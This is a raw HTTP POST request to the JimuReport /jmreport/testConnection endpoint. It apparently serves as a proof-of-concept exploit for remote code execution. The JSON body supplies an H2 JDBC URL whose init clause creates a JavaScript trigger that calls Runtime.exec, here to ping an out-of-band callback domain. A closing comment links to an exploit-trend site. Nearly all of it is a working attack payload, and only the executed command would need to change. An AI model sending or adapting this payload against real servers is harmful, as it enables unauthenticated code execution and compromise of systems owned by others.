POST /jmreport/testConnection HTTP/1.1
Host:
Content-Type: application/json;charset=UTF-8
Content-Length: 406
User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"id": "1",
"code": "dataSource1",
"dbType": "H2",
"dbDriver": "org.h2.Driver",
"dbUrl": "jdbc:h2:mem:test;init=CREATE TRIGGER shell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('ping d5ka8olf5qr25cpgidkgi4x3wncka46dr.oast.fun')\u000A$$",
"dbName": "test",
"dbUsername": "sa",
"dbPassword": "",
"connectTimes": 5
}
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.